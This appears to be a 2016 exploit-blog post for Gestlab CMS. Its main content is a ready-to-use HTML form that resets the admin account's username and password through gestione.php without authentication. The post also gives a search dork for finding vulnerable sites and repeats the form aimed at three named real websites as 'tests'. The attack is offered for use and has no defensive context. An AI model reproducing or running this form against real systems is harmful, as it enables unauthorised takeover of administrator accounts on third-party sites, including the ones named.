Home > Exploit > Gestlab CMS Script Admin User Password Changer Vulnerability

Gestlab CMS Script Admin User Password Changer Vulnerability

Tuesday, September 13, 2016 Exploit

Exploit Detail :

# Exploit Title: Gestlab CMS Script Admin User Password Changer

# Date: 2016-09-13

# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com

# Vendor Homepage: http://www.clicom.it/

# Version:      All Version

# Drok : "Website by Clicom" or "Questo sito utilizza i cookie."

Exploit :

Admin Panel : http://site/gestlab/

<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">

        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->

        user : <input type="text" name="user" value="new username"><br> <!-- new username -->

        pass : <input type="text" name="pass" value="new password"><br> <!-- new password -->

        <input type="submit" name="submit" value="moduser">

</form>

After Show Page or alert go to http://site/gestlab/

now you can login username and password :)

Example :

<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">

        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->

        user : <input type="text" name="user" value="meisam"><br> <!-- new username -->

        pass : <input type="text" name="pass" value="meisam"><br> <!-- new password -->

        <input type="submit" name="submit" value="moduser">

</form>

after run this exploit user and pass : meisam

Test :

<form method="post" action="http://eletras.it/gestlab/gestione.php" enctype="multipart/form-data">

        iduser : <input type="text" name="iduser" value="1"><br>

        user : <input type="text" name="user" value="meisam"><br>

        pass : <input type="text" name="pass" value="meisam"><br>

        <input type="submit" name="submit" value="moduser">

</form>

<form method="post" action="http://www.ristoservicesrl.com/gestlab/gestione.php"enctype="multipart/form-data">

        iduser : <input type="text" name="iduser" value="1"><br>

        user : <input type="text" name="user" value="meisam"><br>

        pass : <input type="text" name="pass" value="meisam"><br>

        <input type="submit" name="submit" value="moduser">

</form>

<form method="post" action="http://www.mcm-america.com/gestlab/gestione.php"enctype="multipart/form-data">

        iduser : <input type="text" name="iduser" value="1"><br>

        user : <input type="text" name="user" value="meisam"><br>

        pass : <input type="text" name="pass" value="meisam"><br>

        <input type="submit" name="submit" value="moduser">

</form>

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )